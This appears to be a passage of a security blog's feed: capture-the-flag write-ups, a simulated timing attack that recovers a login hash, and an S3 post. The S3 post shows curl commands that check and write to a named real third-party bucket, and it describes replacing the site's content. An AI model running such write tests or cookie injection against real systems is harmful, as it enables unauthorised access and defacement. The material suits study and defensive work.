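```python
import hmac
import random

# The value the write-up recovered; it plays the hidden server-side hash here.
SECRET_HEX = "f9865a4952a4f5d74b43f3558fed6a0225c6877fba60a250bcbde753f5db13d8"


class LeakyServer:
    """Constructed stand-in for the FliteThermostat login. It compares the
    submitted hash with the stored one byte by byte and stops at the first
    mismatch, so time spent grows with the length of the matching prefix.
    Elapsed time is modelled (1.0 unit per byte compared plus up to 0.4 unit
    of jitter) rather than measured, so the example runs deterministically."""

    def __init__(self, secret_hex, rng):
        self.secret = bytes.fromhex(secret_hex)
        self.rng = rng

    def check(self, candidate_hex):
        cand = bytes.fromhex(candidate_hex)
        elapsed = self.rng.uniform(0.0, 0.4)
        for i in range(len(self.secret)):
            elapsed += 1.0
            if i >= len(cand) or cand[i] != self.secret[i]:
                return False, elapsed
        return len(cand) == len(self.secret), elapsed


class FixedServer(LeakyServer):
    """Same interface, constant-time comparison: every reply costs the same."""

    def check(self, candidate_hex):
        ok = hmac.compare_digest(bytes.fromhex(candidate_hex), self.secret)
        return ok, len(self.secret) + self.rng.uniform(0.0, 0.4)


def make_server(cls, seed=2019):
    """Seeded so the jitter, and therefore the run, is reproducible."""
    return cls(SECRET_HEX, random.Random(seed))


def recover_hash(server, length=32, shortlist=3, replays=5):
    """Byte-at-a-time recovery, as in the write-up: start from all zeros, try
    all 256 values for the next byte, replay the slowest few to shake out
    jitter, keep the winner, move on. An accepted reply ends the search."""
    known = b""
    for _ in range(length):
        pad = b"\x00" * (length - len(known) - 1)

        def measure(b, n=1):
            cand = (known + bytes([b]) + pad).hex()
            results = [server.check(cand) for _ in range(n)]
            if any(ok for ok, _ in results):
                return float("inf")                       # correct final byte
            return sorted(t for _, t in results)[n // 2]  # median of n samples

        top = sorted(range(256), key=measure, reverse=True)[:shortlist]
        known += bytes([max(top, key=lambda b: measure(b, replays))])
    return known.hex()


if __name__ == "__main__":
    print("leaky server recovered:", recover_hash(make_server(LeakyServer)) == SECRET_HEX)
    print("fixed server recovered:", recover_hash(make_server(FixedServer)) == SECRET_HEX)
```

&lt;p&gt;With the early-exit comparison the correct byte always costs at least one more unit than any wrong byte, which is more than the modelled jitter, so the shortlist-and-replay step picks it every time; with compare_digest the ranking is pure noise and the search walks off into a wrong prefix. The only thing the 64 zeros do is keep the candidate the right length so the server gets as far as the byte under test.&lt;/p&gt;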
&lt;p&gt;The hash was then sent to the server and the response gave a redirect and a Session ID. The session ID was added to a browser with the console command&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;javascript:void(document.cookie=&quot;SessionID=valuereturnedbyserver&quot;);
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;and this enabled access to the web application showing the pages: control, main, update, and diagnostics.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;another shitty cellphone picture, sorry.&lt;/em&gt;
&lt;img src=&quot;/assets/images/50mCTF/loggedin.jpg&quot; alt=&quot;alt text&quot; title=&quot;logged in&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;thermostat-update-page&quot;&gt;Thermostat Update Page:&lt;/h3&gt;

&lt;p&gt;The update page was meant to download and install updates for the application. It was found that the port the server sent its update requests to could be changed by passing PORT=[port#] in the URL. After a scan of all 65,535 ports on the system and several other attempts I ran out of time here.&lt;/p&gt;

&lt;p&gt;This CtF was amazing and I would like to thank everyone who helped build it! I learnt so much in this experience including probably the most important lesson of not jumping on the first vulnerability and thinking it is the end. This will help me in future CtF’s and more importantly in bounty hunting.&lt;/p&gt;

&lt;h2 id=&quot;the-ctf-source&quot;&gt;The CtF Source&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/Hacker0x01/FliteCTF&quot;&gt;https://github.com/Hacker0x01/FliteCTF&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;better-write-ups-than-mine&quot;&gt;Better Write-Ups than mine&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/manoelt/50M_CTF_Writeup&quot;&gt;https://github.com/manoelt/50M_CTF_Writeup&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://ajxchapman.github.io/security/2019/03/26/h1-702-ctf-2019.html&quot;&gt;https://ajxchapman.github.io/security/2019/03/26/h1-702-ctf-2019.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://abdilahrf.github.io/hackerone/h1-702/writeup-hackerone-50m-ctf-h1-702&quot;&gt;https://abdilahrf.github.io/hackerone/h1-702/writeup-hackerone-50m-ctf-h1-702&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://0xc0ffee.io/blog/50M-CTF&quot;&gt;http://0xc0ffee.io/blog/50M-CTF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content><author><name>RabbidByte</name></author><summary type="html"></summary></entry><entry><title type="html">KringleCon 2018</title><link href="http://essentialexploit.com/KringleCon-2018.html" rel="alternate" type="text/html" title="KringleCon 2018" /><published>2019-01-04T07:00:00+00:00</published><updated>2019-01-04T07:00:00+00:00</updated><id>http://essentialexploit.com/KringleCon-2018</id><content type="html" xml:base="http://essentialexploit.com/KringleCon-2018.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;

&lt;p&gt;SANS puts on KringleCon and I have to say not only was it fun but some of it really made me think.  I made it to the end of this one but yet once again … I am writing this way, way after it has been completed so the content is going to lack.  Sorry in advance.&lt;/p&gt;

&lt;p&gt;So some of the “challenges” that were in KringleCon were trivial and I never took notes thinking that I was never going to write about it.  So looking through what I do have saved I will just give some quick summaries on what I have.&lt;/p&gt;

&lt;p&gt;Nope.  I just looked at the files again, and there is going to be no way I can put this one back together.  So I will give a list of the challenges that I recorded and some images.  This write up should go down in history as the worst, oh well.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Bloodhound&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/Bloodhound.PNG&quot; alt=&quot;alt text&quot; title=&quot;Bloodhound&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Dev Ops Fail&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/devops.PNG&quot; alt=&quot;alt text&quot; title=&quot;Dev Ops Fail&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Elf InfoSec&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/ElfInfoSec.PNG&quot; alt=&quot;alt text&quot; title=&quot;Elf InfoSec&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Encrypted Zip&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/encryptedzip.PNG&quot; alt=&quot;alt text&quot; title=&quot;Encrypted Zip&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Google Vent&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/google.PNG&quot; alt=&quot;alt text&quot; title=&quot;Google Vent&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;LethalForensicELFication&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/LethalForensicELFication.PNG&quot; alt=&quot;alt text&quot; title=&quot;Forensic ELF&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Packalyzer – I got nothing but I remember that this drove me crazy … I do have a very cryptic txt file … perhaps this is the lesson to take better notes?&lt;/li&gt;
  &lt;li&gt;Piano&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/piano-done.PNG&quot; alt=&quot;alt text&quot; title=&quot;Piano&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Python Jail&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/python.PNG&quot; alt=&quot;alt text&quot; title=&quot;Python Jail&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Scan-o-matic&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/Scan-o-matic_error.PNG&quot; alt=&quot;alt text&quot; title=&quot;Scan-o-matic&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Sleighbell&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/Sleighbell-win.PNG&quot; alt=&quot;alt text&quot; title=&quot;Sleighbell&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Snort&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/snort-solved.PNG&quot; alt=&quot;alt text&quot; title=&quot;Snort&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Stall Mucking&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/StallMucking.PNG&quot; alt=&quot;alt text&quot; title=&quot;Stall Mucking&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Vi – REALLY … WTF?!&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/vi.PNG&quot; alt=&quot;alt text&quot; title=&quot;vi&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;Webcall&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/webcall2.PNG&quot; alt=&quot;alt text&quot; title=&quot;Web Call&quot; /&gt;&lt;/li&gt;
  &lt;li&gt;YuleLog&lt;br /&gt;&lt;img src=&quot;/assets/images/kringlecon18/YuleLog.PNG&quot; alt=&quot;alt text&quot; title=&quot;Yule Log&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;results&quot;&gt;Results&lt;/h2&gt;

&lt;p&gt;Basically I finished … that’s it.  Plus one really painful writeup, sorry.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/kringlecon18/done.PNG&quot; alt=&quot;alt text&quot; title=&quot;Finish&quot; /&gt;&lt;/p&gt;</content><author><name>RabbidByte</name></author><summary type="html">Summary</summary></entry><entry><title type="html">Metasploit/Rapid7 CtF: 2018</title><link href="http://essentialexploit.com/Metasploit-Rapid7-ctf-2018.html" rel="alternate" type="text/html" title="Metasploit/Rapid7 CtF: 2018" /><published>2018-12-05T07:00:00+00:00</published><updated>2018-12-05T07:00:00+00:00</updated><id>http://essentialexploit.com/Metasploit-Rapid7-ctf-2018</id><content type="html" xml:base="http://essentialexploit.com/Metasploit-Rapid7-ctf-2018.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;

&lt;p&gt;This was the first CtF that I participated in that I actually kept files for.  This was done back in late 2018 and here I am almost 4 months later trying to write about it … yeah, this will not be pretty.  Either way, Metasploit / Rapid7 put on this CtF that you had to register for, and basically you were let loose trying to find images of playing cards.  Once you found a card, the MD5 hash of the image was the flag.  Simple, right?  Well, I did not have nearly enough time to dedicate to this one.  I spent a whopping 3 days, which were not full days, trying to finish this and didn’t get far at all.  So let me just quickly describe what I did end up finding and my results.&lt;/p&gt;

&lt;h2 id=&quot;3-of-clubs&quot;&gt;3 of Clubs&lt;/h2&gt;

&lt;p&gt;This one was a “give me”.  Basically, all you had to do was read the rules of entry on the website.  This being my first CtF I read them just to make sure I knew what I was actually supposed to be doing.  At the end of the rules you found the following:&lt;/p&gt;

&lt;p&gt;Thanks for actually reading our terms of service.  As a show of our gratitude, please find your splendiferous reward by pointing a web browser to your Linux host on port 31063.&lt;/p&gt;

&lt;p&gt;Yeah it was that easy … that’s the 3 of Clubs.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/msf-2018/3_of_clubs.png&quot; alt=&quot;alt text&quot; title=&quot;3 of Clubs&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;3-of-diamonds&quot;&gt;3 of Diamonds&lt;/h2&gt;

&lt;p&gt;What would a CtF be without at least one SQLi vuln, right?  Well, this was one I found.  It was pretty easy to be honest.  Just sqlmap it and the key was sitting in the table.  Enter the key into the website and you got your flag … at least I think.  Either way, that’s how I remember it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/msf-2018/3_of_diamonds.png&quot; alt=&quot;alt text&quot; title=&quot;3 of Diamonds&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;10-of-hearts&quot;&gt;10 of Hearts&lt;/h2&gt;

&lt;p&gt;This flag was found by first port scanning the Linux machine.  On TCP:8080 there was a running Apache Struts instance.  After a little poking and prodding (remember, I am writing this like 4 months later) we find that it is Struts 2.3.  Well, Metasploit has an exploit for that … go figure, right, who made this CtF?&lt;/p&gt;

&lt;p&gt;Using exploit/multi/http/struts2_code_exec_showcase you were able to pop a shell with a reverse bash payload.  Once you were in the system it was time to hunt for the flag.  Eventually I found the flag under /usr/local/tomcat/tmp.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/msf-2018/10_of_hearts.png&quot; alt=&quot;alt text&quot; title=&quot;10 of Hearts&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;my-ranking&quot;&gt;My Ranking&lt;/h2&gt;

&lt;p&gt;Pretty lame but expected for the amount of time I put into it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/msf-2018/results01.PNG&quot; alt=&quot;alt text&quot; title=&quot;Results&quot; /&gt;&lt;br /&gt;
&lt;img src=&quot;/assets/images/msf-2018/results02.PNG&quot; alt=&quot;alt text&quot; title=&quot;Results&quot; /&gt;&lt;br /&gt;
&lt;img src=&quot;/assets/images/msf-2018/results03.PNG&quot; alt=&quot;alt text&quot; title=&quot;Results&quot; /&gt;&lt;br /&gt;&lt;/p&gt;</content><author><name>RabbidByte</name></author><summary type="html">Summary</summary></entry><entry><title type="html">Hacker 101: CtF Series</title><link href="http://essentialexploit.com/hacker-101.html" rel="alternate" type="text/html" title="Hacker 101: CtF Series" /><published>2018-11-01T07:00:00+00:00</published><updated>2018-11-01T07:00:00+00:00</updated><id>http://essentialexploit.com/hacker-101</id><content type="html" xml:base="http://essentialexploit.com/hacker-101.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;

&lt;p&gt;Hacker0x01 has a great &lt;a href=&quot;https://ctf.hacker101.com/ctf&quot;&gt;CtF series&lt;/a&gt; that is just perfect for practicing.  Although it would not be fair to release findings, as there are h1 private invites being awarded for the completion of the challenges, I did think that it would be fine to make a public listing of my progress.  Below is a list of the CtFs and my status.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;A little something to get you started&lt;br /&gt;   Difficulty: Trivial&lt;br /&gt;   Flags: &lt;b&gt;1/1&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Micro-CMS v1&lt;br /&gt;   Difficulty: Easy&lt;br /&gt;   Flags: &lt;b&gt;4/4&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Micro-CMS v2&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: &lt;b&gt;3/3&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Encrypted Pastebin&lt;br /&gt;   Difficulty: Hard&lt;br /&gt;   Flags: 4/4&lt;/li&gt;
  &lt;li&gt;Photo Gallery&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: &lt;b&gt;3/3&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Cody’s First Blog&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: &lt;b&gt;3/3&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Postbook&lt;br /&gt;   Difficulty: Easy&lt;br /&gt;   Flags: &lt;b&gt;7/7&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Ticketastic: Demo Instance&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: &lt;b&gt;0/0&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Ticketastic: Live Instance&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: &lt;b&gt;2/2&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Petshop Pro&lt;br /&gt;   Difficulty: Easy&lt;br /&gt;   Flags: &lt;b&gt;3/3&lt;/b&gt;&lt;/li&gt;
  &lt;li&gt;Model E1337 - Rolling Code Lock&lt;br /&gt;   Difficulty: Hard&lt;br /&gt;   Flags: 0/2&lt;/li&gt;
  &lt;li&gt;TempImage&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: 2/2&lt;/li&gt;
  &lt;li&gt;H1 Thermostat&lt;br /&gt;   Difficulty: Easy&lt;br /&gt;   Flags: 2/2&lt;/li&gt;
  &lt;li&gt;Model E1337 v2 - Hardened Rolling Code Lock&lt;br /&gt;   Difficulty: Expert&lt;br /&gt;   Flags: 0/1&lt;/li&gt;
  &lt;li&gt;Intentional Exercise&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: 1/1&lt;/li&gt;
  &lt;li&gt;Hello World!&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: 1/1&lt;/li&gt;
  &lt;li&gt;Rend Asunder&lt;br /&gt;   Difficulty: Expert&lt;br /&gt;   Flags: 0/3&lt;/li&gt;
  &lt;li&gt;BugDB v1&lt;br /&gt;   Difficulty: Easy&lt;br /&gt;   Flags: 1/1&lt;/li&gt;
  &lt;li&gt;BugDB v2&lt;br /&gt;   Difficulty: Easy&lt;br /&gt;   Flags: 1/1&lt;/li&gt;
  &lt;li&gt;BugDB v3&lt;br /&gt;   Difficulty: Moderate&lt;br /&gt;   Flags: 1/1&lt;/li&gt;
&lt;/ol&gt;</content><author><name>RabbidByte</name></author><summary type="html">Summary</summary></entry><entry><title type="html">AWS S3: Misconfiguration, Discovery, and Abuse</title><link href="http://essentialexploit.com/AWS-S3-Misconfiguration-Discovery-and-Abuse.html" rel="alternate" type="text/html" title="AWS S3: Misconfiguration, Discovery, and Abuse" /><published>2017-06-20T07:00:00+00:00</published><updated>2017-06-20T07:00:00+00:00</updated><id>http://essentialexploit.com/AWS-S3-Misconfiguration-Discovery-and-Abuse</id><content type="html" xml:base="http://essentialexploit.com/AWS-S3-Misconfiguration-Discovery-and-Abuse.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;

&lt;p&gt;Recent news of the Verizon data leak &lt;a href=&quot;http://www.darkreading.com/cloud/verizon-suffers-cloud-data-leak-exposing-data-on-millions-of-customers/&quot;&gt;http://www.darkreading.com/cloud/verizon-suffers-cloud-data-leak-exposing-data-on-millions-of-customers/&lt;/a&gt; and a similar scenario concerning Dow Jones &lt;a href=&quot;http://www.darkreading.com/cloud/dow-jones-data-leak-results-from-amazon-aws-configuration-error/&quot;&gt;http://www.darkreading.com/cloud/dow-jones-data-leak-results-from-amazon-aws-configuration-error/&lt;/a&gt; prompted me to do a little “poking around”. The basic misconfiguration in these cases was that the administrators of the AWS S3 buckets permitted read access to “Everyone” from anywhere. So really all someone had to do was find the S3 bucket and take whatever they wanted. The interesting thing is that AWS changed the ACL configuration on S3 buckets pretty much right after the news of Dow Jones hit the mainstream media.&lt;/p&gt;

&lt;p&gt;I started to think a little bit about this situation. If administrators make the mistake of leaving sensitive information out on S3 buckets with anonymous read access, could they make bigger mistakes? What if an administrator left an S3 bucket open with anonymous read/write access? All that someone would need to do is find the bucket, see if they could write to that bucket, figure out what it is used for, and then manipulate content for fun/profit.&lt;/p&gt;

&lt;p&gt;FYI – I will not post my code for bots/spiders.&lt;/p&gt;

&lt;h2 id=&quot;find-s3-buckets-one-way-out-of-many&quot;&gt;Find S3 Buckets (one way out of many)&lt;/h2&gt;

&lt;p&gt;Going through the net finding S3 buckets and testing them is painfully tedious if done manually, and you would probably never find anything of use. You have to automate this process, and the way I would go about doing this would be by creating a spider.&lt;/p&gt;

&lt;p&gt;Create a simple spider that wanders through the web looking at the source code of webpages for ‘src=’ attributes that point at the following hosts:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;*.s3.amazonaws.com&lt;/li&gt;
  &lt;li&gt;*.s3-[aws regions].amazonaws.com&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once the spider finds these URLs in the src attributes, have it dump the value, along with the page’s URL, to a log file after checking for duplicate entries. That’s it … you found an S3 bucket … whoopee, note sarcasm.&lt;/p&gt;

&lt;p&gt;If you need help building a bot or spider pick up a book and learn. I recommend this one &lt;a href=&quot;https://www.amazon.com/Webbots-Spiders-Screen-Scrapers-Developing/dp/1593273975/&quot;&gt;https://www.amazon.com/Webbots-Spiders-Screen-Scrapers-Developing/dp/1593273975/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I will use CNN.com as an example. I found on the main page the S3 bucket http://s3.amazonaws.com/cnn-sponsored-content&lt;/p&gt;

&lt;h2 id=&quot;check-for-write-permissions-2-different-ways&quot;&gt;Check for Write Permissions (2 different ways)&lt;/h2&gt;

&lt;h3 id=&quot;get-the-acl&quot;&gt;Get the ACL&lt;/h3&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl [s3 bucket url]/?acl
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Probably the easiest and most detailed way to see if you can get anonymous write access is by reading the ACL. This has its drawbacks though: an administrator could have misconfigured the ACL on the bucket’s objects while the bucket itself gives anonymous users no permission to read or write its ACL. In that case the bot would only see that access is denied.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/aws2017/s3-00.png&quot; alt=&quot;alt text&quot; title=&quot;s3-00&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The example from CNN.com gives us the ACL because “Everyone” has access to read the ACL (READ_ACP). You can see this listed at the bottom of the server’s response.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/aws2017/s3-01.png&quot; alt=&quot;alt text&quot; title=&quot;s3-01&quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&amp;lt;URI&amp;gt;http://acs.amazonaws.com/groups/global/AllUsers&amp;lt;/URI&amp;gt;&amp;lt;/Grantee&amp;gt;&amp;lt;Permission&amp;gt; WRITE&amp;lt;/Permission&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Again we don’t want to have to go through all of this manually … you got a puter … use it. Write a simple script to monitor the log file for new entries. When a new S3 bucket URL is written to the log file the script just needs to request the ACL and check for write access. This can all be done with a combination of (you don’t need them all really) curl, grep, awk, and xmllint. Don’t know how to do it? Try google, I really do not want to provide all information for someone to launch a potentially malicious bot/spider.&lt;/p&gt;
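&lt;p&gt;The ACL check described above, as an added example rather than the post’s own tooling: a short Python audit that takes the XML returned by the ?acl request for a bucket you administer and flags any grant to the AllUsers or AuthenticatedUsers groups that carries WRITE, WRITE_ACP or FULL_CONTROL. The sample ACL it runs against is constructed in code, not taken from any real bucket.&lt;/p&gt;

```python
"""Audit an S3 bucket ACL for grants to the public groups.

Added example (not the post's own tooling). Feed it the XML that
`curl [bucket url]/?acl` returns for a bucket you administer; it reports
every grant to AllUsers or AuthenticatedUsers and flags the ones that
allow writing objects or rewriting the ACL itself.
"""
import xml.etree.ElementTree as ET

S3_NS = "http://s3.amazonaws.com/doc/2006-03-01/"
XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"

# Well-known group URIs S3 uses for "Everyone" and "any AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# Permissions that let a grantee change content or the ACL (delete included).
WRITE_LIKE = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def _local(tag):
    """Strip the namespace from an element or attribute name."""
    return tag.rsplit("}", 1)[-1]


def _child(elem, name):
    """First child whose local name matches, or None (namespace-agnostic)."""
    for child in elem:
        if _local(child.tag) == name:
            return child
    return None


def audit_acl(acl_xml):
    """Return a list of (group, permission, severity) for public grants."""
    root = ET.fromstring(acl_xml)
    findings = []
    for grant in root.iter():
        if _local(grant.tag) != "Grant":
            continue
        grantee = _child(grant, "Grantee")
        perm_el = _child(grant, "Permission")
        if grantee is None or perm_el is None:
            continue
        # Only Group grantees can be "Everyone"; canonical users are named accounts.
        xsi_type = [v for k, v in grantee.attrib.items() if _local(k) == "type"]
        if xsi_type != ["Group"]:
            continue
        uri_el = _child(grantee, "URI")
        uri = (uri_el.text or "").strip() if uri_el is not None else ""
        if uri not in PUBLIC_GROUPS:
            continue
        perm = (perm_el.text or "").strip()  # the post's sample shows " WRITE"
        severity = "HIGH" if perm in WRITE_LIKE else "INFO"
        findings.append((PUBLIC_GROUPS[uri], perm, severity))
    return findings


def is_publicly_writable(acl_xml):
    """True when anyone (anonymous or any AWS account) can write or edit the ACL."""
    return any(sev == "HIGH" for _, _, sev in audit_acl(acl_xml))


def build_sample_acl(public_permissions):
    """Constructed sample ACL, not a real bucket's: owner FULL_CONTROL plus one
    AllUsers grant per permission given, in the layout S3 actually returns."""
    ns = "{" + S3_NS + "}"
    root = ET.Element(ns + "AccessControlPolicy")
    owner = ET.SubElement(root, ns + "Owner")
    ET.SubElement(owner, ns + "ID").text = "CONSTRUCTED-OWNER-ID"
    acl = ET.SubElement(root, ns + "AccessControlList")

    def add_grant(xsi_type, perm, uri=None):
        grant = ET.SubElement(acl, ns + "Grant")
        grantee = ET.SubElement(grant, ns + "Grantee", {"{" + XSI_NS + "}type": xsi_type})
        if uri:
            ET.SubElement(grantee, ns + "URI").text = uri
        else:
            ET.SubElement(grantee, ns + "ID").text = "CONSTRUCTED-OWNER-ID"
        ET.SubElement(grant, ns + "Permission").text = perm

    add_grant("CanonicalUser", "FULL_CONTROL")
    for perm in public_permissions:
        add_grant("Group", perm, "http://acs.amazonaws.com/groups/global/AllUsers")
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    sample = build_sample_acl(["READ_ACP", " WRITE"])
    for group, perm, sev in audit_acl(sample):
        print(sev, group, perm)
    print("publicly writable:", is_publicly_writable(sample))
```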

&lt;h3 id=&quot;just-try-to-write-to-the-bucket&quot;&gt;Just Try to Write to the Bucket&lt;/h3&gt;

&lt;p&gt;Another way to test whether you have write access to an S3 bucket is just to write to it. Create a simple txt file with a couple of characters in it. Then use curl to upload it to the S3 bucket. If the connection ENDS with an HTTP/1.1 100 Continue then you have write access to the bucket.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/aws2017/s3-02.png&quot; alt=&quot;alt text&quot; title=&quot;s3-02&quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl -v -H acl=public-read -H key=test.txt -T test.txt http://s3.amazonaws.com/cnn-sponsored-content
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/aws2017/s3-03.png&quot; alt=&quot;alt text&quot; title=&quot;s3-03&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;abuse-what-does-the-bucket-contain&quot;&gt;Abuse: What Does the Bucket Contain&lt;/h3&gt;

&lt;p&gt;This is where it gets a tad fun. So let’s say that CNN had all the videos for their website hosted in an S3 bucket called cnn_video and we successfully wrote to http://s3.amazonaws.com/cnn_video. Well, if you have write access in S3 you also have delete access (at least it seemed that way in my testing).&lt;/p&gt;

&lt;p&gt;So if the video http://s3.amazonaws.com/cnn_video/main.mp4 was linked in www.cnn.com/index.htm then all an attacker would have to do is use the AWS REST API to delete (http://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectDELETE.html) the video in the bucket and replace it with whatever other video they wanted (just named the same). The attacker now has their video posted on CNN … hypothetically of course.&lt;/p&gt;

&lt;h3 id=&quot;note&quot;&gt;Note:&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;All CNN links with the exception of the one S3 bucket are fictional&lt;/li&gt;
  &lt;li&gt;Yes, this was written quickly&lt;/li&gt;
  &lt;li&gt;Yes, this is incomplete&lt;/li&gt;
  &lt;li&gt;No, I will not give you the code for my spider&lt;/li&gt;
&lt;/ul&gt;</content><author><name>RabbidByte</name></author><summary type="html">Summary</summary></entry><entry><title type="html">HackRF: The easy way</title><link href="http://essentialexploit.com/HackRF-The-easy-way.html" rel="alternate" type="text/html" title="HackRF: The easy way" /><published>2016-04-01T07:00:00+00:00</published><updated>2016-04-01T07:00:00+00:00</updated><id>http://essentialexploit.com/HackRF-The-easy-way</id><content type="html" xml:base="http://essentialexploit.com/HackRF-The-easy-way.html">&lt;p&gt;&lt;br /&gt;
&lt;img src=&quot;/assets/images/HRF/HRF-768x280.jpg&quot; alt=&quot;alt text&quot; title=&quot;HackRF Title&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;the-story&quot;&gt;The Story&lt;/h2&gt;
&lt;p&gt;Recently many different radio hacks (mousejack, drone hijacking) have hit the internet. This has spurred my interest in analogue and digital radio. After some binge shopping on the internet and a few days’ wait I have had some very nice toys show up. Once the new-electronics smell and the novelty of a new toy had worn off, the frustration kicked in.&lt;/p&gt;

&lt;p&gt;RTL-SDR is a dirt cheap way to start playing with radio using the RTL2832U chipset. I like to do things right when I start a project, so I decided to purchase a nice SDR hardware transceiver that would provide all the functionality needed without breaking the bank. Enter the HackRF One from &lt;a href=&quot;https://greatscottgadgets.com/hackrf/&quot;&gt;Great Scott Gadgets&lt;/a&gt;.&lt;/p&gt;

